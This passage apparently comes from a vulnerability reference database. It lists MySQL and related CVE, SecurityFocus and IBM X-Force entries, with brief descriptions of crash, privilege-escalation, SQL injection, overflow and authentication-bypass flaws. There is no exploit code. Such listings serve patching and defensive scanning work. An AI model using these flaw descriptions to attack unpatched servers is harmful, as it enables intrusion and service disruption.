10661| [CVE-2009-4019] mysqld in MySQL 5.0.x before 5.0.88 and 5.1.x before 5.1.41 does not (1) properly handle errors during execution of certain SELECT statements with subqueries, and does not (2) preserve certain null_value flags during execution of statements that use the GeomFromWKB function, which allows remote authenticated users to cause a denial of service (daemon crash) via a crafted statement.
10662| [CVE-2009-2446] Multiple format string vulnerabilities in the dispatch_command function in libmysqld/sql_parse.cc in mysqld in MySQL 4.0.0 through 5.0.83 allow remote authenticated users to cause a denial of service (daemon crash) and possibly have unspecified other impact via format string specifiers in a database name in a (1) COM_CREATE_DB or (2) COM_DROP_DB request. NOTE: some of these details are obtained from third party information.
10663| [CVE-2009-0819] sql/item_xmlfunc.cc in MySQL 5.1 before 5.1.32 and 6.0 before 6.0.10 allows remote authenticated users to cause a denial of service (crash) via "an XPath expression employing a scalar expression as a FilterExpr with ExtractValue() or UpdateXML()," which triggers an assertion failure.
10664| [CVE-2008-7247] sql/sql_table.cc in MySQL 5.0.x through 5.0.88, 5.1.x through 5.1.41, and 6.0 before 6.0.9-alpha, when the data home directory contains a symlink to a different filesystem, allows remote authenticated users to bypass intended access restrictions by calling CREATE TABLE with a (1) DATA DIRECTORY or (2) INDEX DIRECTORY argument referring to a subdirectory that requires following this symlink.
10665| [CVE-2008-4456] Cross-site scripting (XSS) vulnerability in the command-line client in MySQL 5.0.26 through 5.0.45, and other versions including versions later than 5.0.45, when the --html option is enabled, allows attackers to inject arbitrary web script or HTML by placing it in a database cell, which might be accessed by this client when composing an HTML document. NOTE: as of 20081031, the issue has not been fixed in MySQL 5.0.67.
10666| [CVE-2008-4098] MySQL before 5.0.67 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are originally associated with pathnames without symlinks, and that can point to tables created at a future time at which a pathname is modified to contain a symlink to a subdirectory of the MySQL home data directory. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-4097.
10667| [CVE-2008-4097] MySQL 5.0.51a allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are associated with symlinks within pathnames for subdirectories of the MySQL home data directory, which are followed when tables are created in the future. NOTE: this vulnerability exists because of an incomplete fix for CVE-2008-2079.
10668| [CVE-2008-3963] MySQL 5.0 before 5.0.66, 5.1 before 5.1.26, and 6.0 before 6.0.6 does not properly handle a b'' (b single-quote single-quote) token, aka an empty bit-string literal, which allows remote attackers to cause a denial of service (daemon crash) by using this token in a SQL statement.
10669| [CVE-2008-2079] MySQL 4.1.x before 4.1.24, 5.0.x before 5.0.60, 5.1.x before 5.1.24, and 6.0.x before 6.0.5 allows local users to bypass certain privilege checks by calling CREATE TABLE on a MyISAM table with modified (1) DATA DIRECTORY or (2) INDEX DIRECTORY arguments that are within the MySQL home data directory, which can point to tables that are created in the future.
10670| [CVE-2008-1486] SQL injection vulnerability in Phorum before 5.2.6, when mysql_use_ft is disabled, allows remote attackers to execute arbitrary SQL commands via the non-fulltext search.
10671| [CVE-2007-6313] MySQL Server 5.1.x before 5.1.23 and 6.0.x before 6.0.4 does not check the rights of the entity executing BINLOG, which allows remote authorized users to execute arbitrary BINLOG statements.
10672| [CVE-2007-6304] The federated engine in MySQL 5.0.x before 5.0.51a, 5.1.x before 5.1.23, and 6.0.x before 6.0.4, when performing a certain SHOW TABLE STATUS query, allows remote MySQL servers to cause a denial of service (federated handler crash and daemon crash) via a response that lacks the minimum required number of columns.
10673| [CVE-2007-6303] MySQL 5.0.x before 5.0.51a, 5.1.x before 5.1.23, and 6.0.x before 6.0.4 does not update the DEFINER value of a view when the view is altered, which allows remote authenticated users to gain privileges via a sequence of statements including a CREATE SQL SECURITY DEFINER VIEW statement and an ALTER VIEW statement.
10674| [CVE-2007-5970] MySQL 5.1.x before 5.1.23 and 6.0.x before 6.0.4 allows remote authenticated users to gain privileges on arbitrary tables via unspecified vectors involving use of table-level DATA DIRECTORY and INDEX DIRECTORY options when creating a partitioned table with the same name as a table on which the user lacks privileges.
10675| [CVE-2007-5969] MySQL Community Server 5.0.x before 5.0.51, Enterprise Server 5.0.x before 5.0.52, Server 5.1.x before 5.1.23, and Server 6.0.x before 6.0.4, when a table relies on symlinks created through explicit DATA DIRECTORY and INDEX DIRECTORY options, allows remote authenticated users to overwrite system table information and gain privileges via a RENAME TABLE statement that changes the symlink to point to an existing file.
10676| [CVE-2007-5925] The convert_search_mode_to_innobase function in ha_innodb.cc in the InnoDB engine in MySQL 5.1.23-BK and earlier allows remote authenticated users to cause a denial of service (database crash) via a certain CONTAINS operation on an indexed column, which triggers an assertion error.
10677| [CVE-2007-5646] SQL injection vulnerability in Sources/Search.php in Simple Machines Forum (SMF) 1.1.3, when MySQL 5 is used, allows remote attackers to execute arbitrary SQL commands via the userspec parameter in a search2 action to index.php.
10678| [CVE-2007-4889] The MySQL extension in PHP 5.2.4 and earlier allows remote attackers to bypass safe_mode and open_basedir restrictions via the MySQL (1) LOAD_FILE, (2) INTO DUMPFILE, and (3) INTO OUTFILE functions, a different issue than CVE-2007-3997.
10679| [CVE-2007-3997] The (1) MySQL and (2) MySQLi extensions in PHP 4 before 4.4.8, and PHP 5 before 5.2.4, allow remote attackers to bypass safe_mode and open_basedir restrictions via MySQL LOCAL INFILE operations, as demonstrated by a query with LOAD DATA LOCAL INFILE.
10680| [CVE-2007-3782] MySQL Community Server before 5.0.45 allows remote authenticated users to gain update privileges for a table in another database via a view that refers to this external table.
10681| [CVE-2007-3781] MySQL Community Server before 5.0.45 does not require privileges such as SELECT for the source table in a CREATE TABLE LIKE statement, which allows remote authenticated users to obtain sensitive information such as the table structure.
10682| [CVE-2007-3780] MySQL Community Server before 5.0.45 allows remote attackers to cause a denial of service (daemon crash) via a malformed password packet in the connection protocol.
10683| [CVE-2007-2693] MySQL before 5.1.18 allows remote authenticated users without SELECT privileges to obtain sensitive information from partitioned tables via an ALTER TABLE statement.
10684| [CVE-2007-2692] The mysql_change_db function in MySQL 5.0.x before 5.0.40 and 5.1.x before 5.1.18 does not restore THD::db_access privileges when returning from SQL SECURITY INVOKER stored routines, which allows remote authenticated users to gain privileges.
10685| [CVE-2007-2691] MySQL before 4.1.23, 5.0.x before 5.0.42, and 5.1.x before 5.1.18 does not require the DROP privilege for RENAME TABLE statements, which allows remote authenticated users to rename arbitrary tables.
10686| [CVE-2007-2583] The in_decimal::set function in item_cmpfunc.cc in MySQL before 5.0.40, and 5.1 before 5.1.18-beta, allows context-dependent attackers to cause a denial of service (crash) via a crafted IF clause that results in a divide-by-zero error and a NULL pointer dereference.
10687| [CVE-2007-1420] MySQL 5.x before 5.0.36 allows local users to cause a denial of service (database crash) by performing information_schema table subselects and using ORDER BY to sort a single-row result, which prevents certain structure elements from being initialized and triggers a NULL dereference in the filesort function.
10688| [CVE-2006-7232] sql_select.cc in MySQL 5.0.x before 5.0.32 and 5.1.x before 5.1.14 allows remote authenticated users to cause a denial of service (crash) via an EXPLAIN SELECT FROM on the INFORMATION_SCHEMA table, as originally demonstrated using ORDER BY.
10689| [CVE-2006-4835] Bluview Blue Magic Board (BMB) (aka BMForum) 5.5 allows remote attackers to obtain sensitive information via a direct request to (1) footer.php, (2) header.php, (3) db_mysql_error.php, (4) langlist.php, (5) sendmail.php, or (6) style.php, which reveals the path in various error messages.
10690| [CVE-2006-4227] MySQL before 5.0.25 and 5.1 before 5.1.12 evaluates arguments of suid routines in the security context of the routine's definer instead of the routine's caller, which allows remote authenticated users to gain privileges through a routine that has been made available using GRANT EXECUTE.
10691| [CVE-2006-4226] MySQL before 4.1.21, 5.0 before 5.0.25, and 5.1 before 5.1.12, when run on case-sensitive filesystems, allows remote authenticated users to create or access a database when the database name differs only in case from a database for which they have permissions.
10692| [CVE-2006-4031] MySQL 4.1 before 4.1.21 and 5.0 before 5.0.24 allows a local user to access a table through a previously created MERGE table, even after the user's privileges are revoked for the original table, which might violate intended security policy.
10693| [CVE-2006-3486] ** DISPUTED ** Off-by-one buffer overflow in the Instance_options::complete_initialization function in instance_options.cc in the Instance Manager in MySQL before 5.0.23 and 5.1 before 5.1.12 might allow local users to cause a denial of service (application crash) via unspecified vectors, which triggers the overflow when the convert_dirname function is called. NOTE: the vendor has disputed this issue via e-mail to CVE, saying that it is only exploitable when the user has access to the configuration file or the Instance Manager daemon. Due to intended functionality, this level of access would already allow the user to disrupt program operation, so this does not cross security boundaries and is not a vulnerability.
10694| [CVE-2006-3469] Format string vulnerability in time.cc in MySQL Server 4.1 before 4.1.21 and 5.0 before 1 April 2006 allows remote authenticated users to cause a denial of service (crash) via a format string instead of a date as the first parameter to the date_format function, which is later used in a formatted print call to display the error message.
10695| [CVE-2006-3081] mysqld in MySQL 4.1.x before 4.1.18, 5.0.x before 5.0.19, and 5.1.x before 5.1.6 allows remote authorized users to cause a denial of service (crash) via a NULL second argument to the str_to_date function.
10696| [CVE-2006-2753] SQL injection vulnerability in MySQL 4.1.x before 4.1.20 and 5.0.x before 5.0.22 allows context-dependent attackers to execute arbitrary SQL commands via crafted multibyte encodings in character sets such as SJIS, BIG5, and GBK, which are not properly handled when the mysql_real_escape function is used to escape the input.
10697| [CVE-2006-1518] Buffer overflow in the open_table function in sql_base.cc in MySQL 5.0.x up to 5.0.20 might allow remote attackers to execute arbitrary code via crafted COM_TABLE_DUMP packets with invalid length values.
10698| [CVE-2006-1517] sql_parse.cc in MySQL 4.0.x up to 4.0.26, 4.1.x up to 4.1.18, and 5.0.x up to 5.0.20 allows remote attackers to obtain sensitive information via a COM_TABLE_DUMP request with an incorrect packet length, which includes portions of memory in an error message.
10699| [CVE-2006-1516] The check_connection function in sql_parse.cc in MySQL 4.0.x up to 4.0.26, 4.1.x up to 4.1.18, and 5.0.x up to 5.0.20 allows remote attackers to read portions of memory via a username without a trailing null byte, which causes a buffer over-read.
10700| [CVE-2006-0903] MySQL 5.0.18 and earlier allows local users to bypass logging mechanisms via SQL queries that contain the NULL character, which are not properly handled by the mysql_real_query function. NOTE: this issue was originally reported for the mysql_query function, but the vendor states that since mysql_query expects a null character, this is not an issue for mysql_query.
10701| [CVE-2006-0369] ** DISPUTED ** MySQL 5.0.18 allows local users with access to a VIEW to obtain sensitive information via the "SELECT * FROM information_schema.views
10702| [CVE-2006-0200] Format string vulnerability in the error-reporting feature in the mysqli extension in PHP 5.1.0 and 5.1.1 might allow remote attackers to execute arbitrary code via format string specifiers in MySQL error messages.
10703| [CVE-2005-2573] The mysql_create_function function in sql_udf.cc for MySQL 4.0 before 4.0.25, 4.1 before 4.1.13, and 5.0 before 5.0.7-beta, when running on Windows, uses an incomplete blacklist in a directory traversal check, which allows attackers to include arbitrary files via the backslash (\) character.
10704| [CVE-2005-2558] Stack-based buffer overflow in the init_syms function in MySQL 4.0 before 4.0.25, 4.1 before 4.1.13, and 5.0 before 5.0.7-beta allows remote authenticated users who can create user-defined functions to execute arbitrary code via a long function_name field.
10705| [CVE-2005-1636] mysql_install_db in MySQL 4.1.x before 4.1.12 and 5.x up to 5.0.4 creates the mysql_install_db.X file with a predictable filename and insecure permissions, which allows local users to execute arbitrary SQL commands by modifying the file's contents.
10706| [CVE-2005-0004] The mysqlaccess script in MySQL 4.0.23 and earlier, 4.1.x before 4.1.10, 5.0.x before 5.0.3, and other versions including 3.x, allows local users to overwrite arbitrary files or read temporary files via a symlink attack on temporary files.
10707| [CVE-2004-0835] MySQL 3.x before 3.23.59, 4.x before 4.0.19, 4.1.x before 4.1.2, and 5.x before 5.0.1, checks the CREATE/INSERT rights of the original table instead of the target table in an ALTER TABLE RENAME operation, which could allow attackers to conduct unauthorized activities.
10708| [CVE-2004-0628] Stack-based buffer overflow in MySQL 4.1.x before 4.1.3, and 5.0, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long scramble string.
10709| [CVE-2004-0627] The check_scramble_323 function in MySQL 4.1.x before 4.1.3, and 5.0, allows remote attackers to bypass authentication via a zero-length scrambled string.
10710|
10711| SecurityFocus - https://www.securityfocus.com/bid/:
10712| [52154] RETIRED: MySQL 5.5.20 Unspecified Remote Code Execution Vulnerability
10713| [47871] Oracle MySQL Prior to 5.1.52 Multiple Denial Of Service Vulnerabilities
10714| [43677] Oracle MySQL Prior to 5.1.50 Privilege Escalation Vulnerability
10715| [43676] Oracle MySQL Prior to 5.1.51 Multiple Denial Of Service Vulnerabilities
10716| [42646] Oracle MySQL Prior to 5.1.49 'JOIN' Statement Denial Of Service Vulnerability
10717| [42643] Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability
10718| [42638] Oracle MySQL Prior to 5.1.49 Malformed 'BINLOG' Arguments Denial Of Service Vulnerability
10719| [42596] Oracle MySQL Prior to 5.1.49 'WITH ROLLUP' Denial Of Service Vulnerability
10720| [42586] RETIRED: Oracle MySQL Prior to 5.1.49 Multiple Denial Of Service Vulnerabilities
10721| [37640] MySQL 5.0.51a Unspecified Remote Code Execution Vulnerability
10722| [36242] MySQL 5.x Unspecified Buffer Overflow Vulnerability
10723|
10724| IBM X-Force - https://exchange.xforce.ibmcloud.com:
10725| [85724] Oracle MySQL Server XA Transactions denial of service
10726| [85723] Oracle MySQL Server Server Replication denial of service
10727| [85722] Oracle MySQL Server InnoDB denial of service
10728| [85721] Oracle MySQL Server Server Privileges unspecified
10729| [85720] Oracle MySQL Server Server Partition denial of service
10730| [85719] Oracle MySQL Server Server Parser denial of service
10731| [85718] Oracle MySQL Server Server Options denial of service
10732| [85717] Oracle MySQL Server Server Options denial of service
10733| [85716] Oracle MySQL Server Server Optimizer denial of service
10734| [85715] Oracle MySQL Server Server Optimizer denial of service
10735| [85714] Oracle MySQL Server Prepared Statements denial of service
10736| [85713] Oracle MySQL Server InnoDB denial of service
10737| [85712] Oracle MySQL Server Full Text Search denial of service
10738| [85711] Oracle MySQL Server Data Manipulation Language denial of service
10739| [85710] Oracle MySQL Server Data Manipulation Language denial of service
10740| [85709] Oracle MySQL Server Audit Log unspecified
10741| [85708] Oracle MySQL Server MemCached unspecified
10742| [84846] Debian mysql-server package information disclosure
10743| [84375] Wireshark MySQL dissector denial of service
10744| [83554] Oracle MySQL Server Server Partition denial of service
10745| [83553] Oracle MySQL Server Server Locking denial of service
10746| [83552] Oracle MySQL Server Server Install unspecified
10747| [83551] Oracle MySQL Server Server Types denial of service
10748| [83550] Oracle MySQL Server Server Privileges unspecified
10749| [83549] Oracle MySQL Server InnoDB denial of service
10750| [83548] Oracle MySQL Server InnoDB denial of service
10751| [83547] Oracle MySQL Server Data Manipulation Language denial of service
10752| [83546] Oracle MySQL Server Stored Procedure denial of service
10753| [83545] Oracle MySQL Server Server Replication denial of service
10754| [83544] Oracle MySQL Server Server Partition denial of service
10755| [83543] Oracle MySQL Server Server Optimizer denial of service
10756| [83542] Oracle MySQL Server InnoDB denial of service
10757| [83541] Oracle MySQL Server Information Schema denial of service
10758| [83540] Oracle MySQL Server Data Manipulation Language denial of service
10759| [83539] Oracle MySQL Server Data Manipulation Language denial of service
10760| [83538] Oracle MySQL Server Server Optimizer unspecified
10761| [83537] Oracle MySQL Server MemCached denial of service
10762| [83536] Oracle MySQL Server Server Privileges unspecified
10763| [83535] Oracle MySQL Server Server Privileges unspecified
10764| [83534] Oracle MySQL Server Server unspecified
10765| [83533] Oracle MySQL Server Information Schema unspecified
10766| [83532] Oracle MySQL Server Server Locking unspecified
10767| [83531] Oracle MySQL Server Data Manipulation Language denial of service
10768| [83388] MySQL administrative login attempt detected
10769| [82963] Mambo MySQL database information disclosure
10770| [82946] Oracle MySQL buffer overflow
10771| [82945] Oracle MySQL buffer overflow
10772| [82895] Oracle MySQL and MariaDB geometry queries denial of service
10773| [81577] MySQL2JSON extension for TYPO3 unspecified SQL injection
10774| [81325] Oracle MySQL Server Server Privileges denial of service
10775| [81324] Oracle MySQL Server Server Partition denial of service
10776| [81323] Oracle MySQL Server Server Optimizer denial of service
10777| [81322] Oracle MySQL Server Server Optimizer denial of service
10778| [81321] Oracle MySQL Server Server denial of service
10779| [81320] Oracle MySQL Server MyISAM denial of service
10780| [81319] Oracle MySQL Server InnoDB denial of service
10781| [81318] Oracle MySQL Server InnoDB denial of service
10782| [81317] Oracle MySQL Server Server Locking denial of service
10783| [81316] Oracle MySQL Server Server denial of service
10784| [81315] Oracle MySQL Server Server Replication unspecified
10785| [81314] Oracle MySQL Server Server Replication unspecified
10786| [81313] Oracle MySQL Server Stored Procedure denial of service
10787| [81312] Oracle MySQL Server Server Optimizer denial of service
10788| [81311] Oracle MySQL Server Information Schema denial of service
10789| [81310] Oracle MySQL Server GIS Extension denial of service
10790| [80790] Oracle MySQL yaSSL buffer overflow
10791| [80553] Oracle MySQL and MariaDB salt security bypass
10792| [80443] Oracle MySQL Server unspecified code execution
10793| [80442] Oracle MySQL Server acl_get() buffer overflow
10794| [80440] Oracle MySQL Server table buffer overflow
10795| [80435] Oracle MySQL Server database privilege escalation
10796| [80434] Oracle MySQL Server COM_BINLOG_DUMP denial of service
10797| [80433] Oracle MySQL Server Stuxnet privilege escalation
10798| [80432] Oracle MySQL Server authentication information disclosure
10799| [79394] Oracle MySQL Server Server Installation information disclosure
10800| [79393] Oracle MySQL Server Server Replication denial of service
10801| [79392] Oracle MySQL Server Server Full Text Search denial of service
10802| [79391] Oracle MySQL Server Server denial of service
10803| [79390] Oracle MySQL Server Client information disclosure
10804| [79389] Oracle MySQL Server Server Optimizer denial of service
10805| [79388] Oracle MySQL Server Server Optimizer denial of service
10806| [79387] Oracle MySQL Server Server denial of service
10807| [79386] Oracle MySQL Server InnoDB Plugin denial of service
10808| [79385] Oracle MySQL Server InnoDB denial of service
10809| [79384] Oracle MySQL Server Client unspecified
10810| [79383] Oracle MySQL Server Server denial of service
10811| [79382] Oracle MySQL Server Protocol unspecified
10812| [79381] Oracle MySQL Server Information Schema unspecified
10813| [78954] SilverStripe MySQLDatabase.php information disclosure
10814| [78948] MySQL MyISAM table symlink
10815| [77865] MySQL unknown vuln
10816| [77864] MySQL sort order denial of service
10817| [77768] MySQLDumper refresh_dblist.php information disclosure
10818| [77177] MySQL Squid Access Report unspecified cross-site scripting
10819| [77065] Oracle MySQL Server Optimizer denial of service
10820| [77064] Oracle MySQL Server Optimizer denial of service
10821| [77063] Oracle MySQL Server denial of service
10822| [77062] Oracle MySQL InnoDB denial of service
10823| [77061] Oracle MySQL GIS Extension denial of service
10824| [77060] Oracle MySQL Server Optimizer denial of service
10825| [76189] MySQL unspecified error
10826| [76188] MySQL attempts security bypass
10827| [75287] MySQLDumper restore.php information disclosure
10828| [75286] MySQLDumper filemanagement.php directory traversal
10829| [75285] MySQLDumper main.php cross-site request forgery
10830| [75284] MySQLDumper install.php cross-site scripting
10831| [75283] MySQLDumper install.php file include
10832| [75282] MySQLDumper menu.php code execution
10833| [75022] Oracle MySQL Server Server Optimizer denial of service
10834| [75021] Oracle MySQL Server Server Optimizer denial of service
10835| [75020] Oracle MySQL Server Server DML denial of service
10836| [75019] Oracle MySQL Server Partition denial of service
10837| [75018] Oracle MySQL Server MyISAM denial of service
10838| [75017] Oracle MySQL Server Server Optimizer denial of service
10839| [74672] Oracle MySQL Server multiple unspecified
10840| [73092] MySQL unspecified code execution
10841| [72540] Oracle MySQL Server denial of service
10842| [72539] Oracle MySQL Server unspecified
10843| [72538] Oracle MySQL Server denial of service
10844| [72537] Oracle MySQL Server denial of service
10845| [72536] Oracle MySQL Server unspecified
10846| [72535] Oracle MySQL Server denial of service
10847| [72534] Oracle MySQL Server denial of service
10848| [72533] Oracle MySQL Server denial of service
10849| [72532] Oracle MySQL Server denial of service
10850| [72531] Oracle MySQL Server denial of service
10851| [72530] Oracle MySQL Server denial of service
10852| [72529] Oracle MySQL Server denial of service
10853| [72528] Oracle MySQL Server denial of service
10854| [72527] Oracle MySQL Server denial of service
10855| [72526] Oracle MySQL Server denial of service
10856| [72525] Oracle MySQL Server information disclosure
10857| [72524] Oracle MySQL Server denial of service
10858| [72523] Oracle MySQL Server denial of service
10859| [72522] Oracle MySQL Server denial of service
10860| [72521] Oracle MySQL Server denial of service
10861| [72520] Oracle MySQL Server denial of service
10862| [72519] Oracle MySQL Server denial of service
10863| [72518] Oracle MySQL Server unspecified
10864| [72517] Oracle MySQL Server unspecified
10865| [72516] Oracle MySQL Server unspecified
10866| [72515] Oracle MySQL Server denial of service
10867| [72514] Oracle MySQL Server unspecified
10868| [71965] MySQL port denial of service
10869| [70680] DBD::mysqlPP unspecified SQL injection
10870| [70370] TaskFreak! multi-mysql unspecified path disclosure
10871| [68799] mod_authnz_external module for Apache mysql-auth.pl SQL injection
10872| [68294] MySQLDriverCS statement.cs sql injection
10873| [68175] Prosody MySQL denial of service
10874| [67539] Zend Framework MySQL PDO security bypass
10875| [67254] DirectAdmin MySQL information disclosure
10876| [66567] Xoops mysql.sql information disclosure
10877| [65871] PyWebDAV MySQLAuthHandler class SQL injection
10878| [65543] MySQL Select Arbitrary data into a File
10879| [65529] MySQL Eventum full_name field cross-site scripting
10880| [65380] Oracle MySQL Eventum forgot_password.php cross-site scripting
10881| [65379] Oracle MySQL Eventum list.php cross-site scripting
10882| [65266] Accellion File Transfer Appliance MySQL default password
10883| [64878] MySQL Geometry denial of service
10884| [64877] MySQL EXPLAIN EXTENDED denial of service
10885| [64876] MySQL prepared statement denial of service
10886| [64845] MySQL extreme-value denial of service
10887| [64844] MySQL Gis_line_string::init_from_wkb denial of service
10888| [64843] MySQL user-variable denial of service
10889| [64842] MySQL view preparation denial of service
10890| [64841] MySQL prepared statement denial of service
10891| [64840] MySQL LONGBLOB denial of service
10892| [64839] MySQL invocations denial of service
10893| [64838] MySQL Gis_line_string::init_from_wkb denial of service
10894| [64689] MySQL dict0crea.c denial of service
10895| [64688] MySQL SET column denial of service
10896| [64687] MySQL BINLOG command denial of service
10897| [64686] MySQL InnoDB denial of service
10898| [64685] MySQL HANDLER interface denial of service
10899| [64684] MySQL Item_singlerow_subselect::store denial of service
10900| [64683] MySQL OK packet denial of service
10901| [63518] MySQL Query Browser GUI Tools information disclosure
10902| [63517] MySQL Administrator GUI Tools information disclosure
10903| [62272] MySQL PolyFromWKB() denial of service
10904| [62269] MySQL LIKE predicates denial of service
10905| [62268] MySQL joins denial of service
10906| [62267] MySQL GREATEST() or LEAST() denial of service
10907| [62266] MySQL GROUP_CONCAT() denial of service
10908| [62265] MySQL expression values denial of service
10909| [62264] MySQL temporary table denial of service
10910| [62263] MySQL LEAST() or GREATEST() denial of service
10911| [62262] MySQL replication privilege escalation
10912| [61739] MySQL WITH ROLLUP denial of service
10913| [61343] MySQL LOAD DATA INFILE denial of service
10914| [61342] MySQL EXPLAIN denial of service
10915| [61341] MySQL HANDLER denial of service
10916| [61340] MySQL BINLOG denial of service
10917| [61339] MySQL IN() or CASE denial of service
10918| [61338] MySQL SET denial of service
10919| [61337] MySQL DDL denial of service
10920| [61318] PHP mysqlnd_wireprotocol.c buffer overflow
10921| [61317] PHP php_mysqlnd_read_error_from_line buffer overflow
10922| [61316] PHP php_mysqlnd_auth_write buffer overflow
10923| [61274] MySQL TEMPORARY InnoDB denial of service
10924| [59905] MySQL ALTER DATABASE denial of service
10925| [59841] CMySQLite updateUser.php cross-site request forgery
10926| [59112] MySQL Enterprise Monitor unspecified cross-site request forgery
10927| [59075] PHP php_mysqlnd_auth_write() buffer overflow
10928| [59074] PHP php_mysqlnd_read_error_from_line() buffer overflow
10929| [59073] PHP php_mysqlnd_rset_header_read() buffer overflow
10930| [59072] PHP php_mysqlnd_ok_read() information disclosure
10931| [58842] MySQL DROP TABLE file deletion
10932| [58676] Template Shares MySQL information disclosure
10933| [58531] MySQL COM_FIELD_LIST buffer overflow
10934| [58530] MySQL packet denial of service
10935| [58529] MySQL COM_FIELD_LIST security bypass
10936| [58311] ClanSphere the captcha generator and MySQL driver SQL injection
10937| [57925] MySQL UNINSTALL PLUGIN security bypass
10938| [57006] Quicksilver Forums mysqldump information disclosure
10939| [56800] Employee Timeclock Software mysqldump information disclosure
10940| [56200] Flex MySQL Connector ActionScript SQL injection
10941| [55877] MySQL yaSSL buffer overflow
10942| [55622] kiddog_mysqldumper extension for TYPO3 information disclosure
10943| [55416] MySQL unspecified buffer overflow
10944| [55382] Ublog UblogMySQL.sql information disclosure
10945| [55251] PHP-MySQL-Quiz editquiz.php SQL injection
10946| [54597] MySQL sql_table.cc security bypass
10947| [54596] MySQL mysqld denial of service
10948| [54365] MySQL OpenSSL security bypass
10949| [54364] MySQL MyISAM table symlink
10950| [53950] The mysql-ocaml mysql_real_escape_string weak security
10951| [52978] Zmanda Recovery Manager for MySQL mysqlhotcopy privilege escalation
10952| [52977] Zmanda Recovery Manager for MySQL socket-server.pl command execution
10953| [52660] iScouter PHP Web Portal MySQL Password Retrieval
10954| [52220] aa33code mysql.inc information disclosure
10955| [52122] MySQL Connector/J unicode SQL injection
10956| [51614] MySQL dispatch_command() denial of service
10957| [51406] MySQL Connector/NET SSL spoofing
10958| [49202] MySQL UDF command execution
10959| [49050] MySQL XPath denial of service
10960| [48919] Cisco Application Networking Manager MySQL default account password
10961| [48163] libapache2-mod-auth-mysql module for Debian multibyte encoding SQL injection
10962| [47544] MySQL Calendar index.php SQL injection
10963| [47476] MySQL Calendar index.php nodstrumCalendarV2 security bypass
10964| [45649] MySQL MyISAM symlink security bypass
10965| [45648] MySQL MyISAM symlinks security bypass
10966| [45607] MySQL Quick Admin actions.php file include
10967| [45606] MySQL Quick Admin index.php file include
10968| [45590] MySQL command-line client cross-site scripting
10969| [45436] PromoteWeb MySQL go.php SQL injection
10970| [45042] MySQL empty bit-string literal denial of service
10971| [44662] mysql-lists unspecified cross-site scripting
10972| [42267] MySQL MyISAM security bypass
10973| [42211] GEDCOM_to_MySQL2 index.php, info.php and prenom.php cross-site scripting
10974| [42014] miniBB setup_mysql.php and setup_options.php SQL injection
10975| [40920] MySQL sql_select.cc denial of service
10976| [40734] MySQL Server BINLOG privilege escalation
10977| [40350] MySQL password information disclosure
10978| [39415] Debian GNU/Linux libdspam7-drv-mysql cron job password disclosure
10979| [39402] PHP LOCAL INFILE and MySQL extension security bypass
10980| [38999] aurora framework db_mysql.lib SQL injection
10981| [38990] MySQL federated engine denial of service
10982| [38989] MySQL DEFINER value privilege escalation
10983| [38988] MySQL DATA DIRECTORY and INDEX DIRECTORY privilege escalation
10984| [38964] MySQL RENAME TABLE symlink
10985| [38733] ManageEngine EventLog Analyzer MySQL default password
10986| [38284] MySQL ha_innodb.cc convert_search_mode_to_innobase() denial of service
10987| [38189] MySQL default root password
10988| [37235] Asterisk-Addons cdr_addon_mysql module SQL injection
10989| [37099] RHSA update for MySQL case sensistive database name privilege escalation not installed
10990| [36555] PHP MySQL extension multiple functions security bypass
10991| [35960] MySQL view privilege escalation
10992| [35959] MySQL CREATE TABLE LIKE information disclosure
10993| [35958] MySQL connection protocol denial of service
10994| [35291] MySQLDumper main.php security bypass
10995| [34811] MySQL udf_init and mysql_create_function command execution
10996| [34809] MySQL mysql_update privilege escalation
10997| [34349] MySQL ALTER information disclosure
10998| [34348] MySQL mysql_change_db privilege escalation
10999| [34347] MySQL RENAME TABLE weak security
11000| [34232] MySQL IF clause denial of service
11001| [33388] Advanced Website Creator (AWC) mysql_escape_string SQL injection
11002| [33285] Eve-Nuke mysql.php file include
11003| [32957] MySQL Commander dbopen.php file include
11004| [32933] cPanel load_language.php and mysqlconfig.php file include
11005| [32911] MySQL filesort function denial of service
11006| [32462] cPanel passwdmysql cross-site scripting
11007| [32288] RHSA-2006:0544 updates for mysql not installed
11008| [32266] MySQLNewsEngine affichearticles.php3 file include
11009| [31244] The Address Book MySQL export.php password information disclosure
11010| [31037] Php/Mysql Site Builder (PHPBuilder) htm2php.php directory traversal
11011| [30760] BTSaveMySql URL file disclosure
11012| [30191] StoryStream mysql.php and mysqli.php file include
11013| [30085] MySQL MS-DOS device name denial of service
11014| [30031] Agora MysqlfinderAdmin.php file include
11015| [29438] MySQLDumper mysqldumper_path/sql.php cross-site scripting
11016| [29179] paBugs class.mysql.php file include
11017| [29120] ZoomStats MySQL file include
11018| [28448] MySQL case sensitive database name privilege escalation
11019| [28442] MySQL GRANT EXECUTE privilege escalation
11020| [28387] FunkBoard admin/mysql_install.php and admin/pg_install.php unauthorized access
11021| [28202] MySQL multiupdate subselect query denial of service
11022| [28180] MySQL MERGE table security bypass
11023| [28176] PHP MySQL Banner Exchange lib.inc information disclosure
11024| [27995] Opsware Network Automation System MySQL plaintext password
11025| [27904] MySQL date_format() format string
11026| [27635] MySQL Instance Manager denial of service
11027| [27212] MySQL SELECT str_to_date denial of service
11028| [26875] MySQL ASCII escaping SQL injection
11029| [26420] Apple Mac OS X MySQL Manager blank password
11030| [26236] MySQL login packet information disclosure
11031| [26232] MySQL COM_TABLE_DUMP buffer overflow
11032| [26228] MySQL sql_parce.cc information disclosure
11033| [26042] MySQL running
11034| [25313] WoltLab Burning Board class_db_mysql.php cross-site scripting
11035| [24966] MySQL mysql_real_query logging bypass
11036| [24653] PAM-MySQL logging function denial of service
11037| [24652] PAM-MySQL authentication double free code execution
11038| [24567] PHP/MYSQL Timesheet index.php and changehrs.php SQL injection
11039| [24095] PHP ext/mysqli exception handling format string
11040| [23990] PHP mysql_connect() buffer overflow
11041| [23596] MySQL Auction search module could allow cross-site scripting
11042| [22642] RHSA-2005:334 updates for mysql not installed
11043| [21757] MySQL UDF library functions command execution
11044| [21756] MySQL LoadLibraryEx function denial of service
11045| [21738] MySQL UDF mysql_create_function function directory traversal
11046| [21737] MySQL user defined function buffer overflow
11047| [21640] MySQL Eventum multiple class SQL injection
11048| [21638] MySQL Eventum multiple scripts cross-site scripting
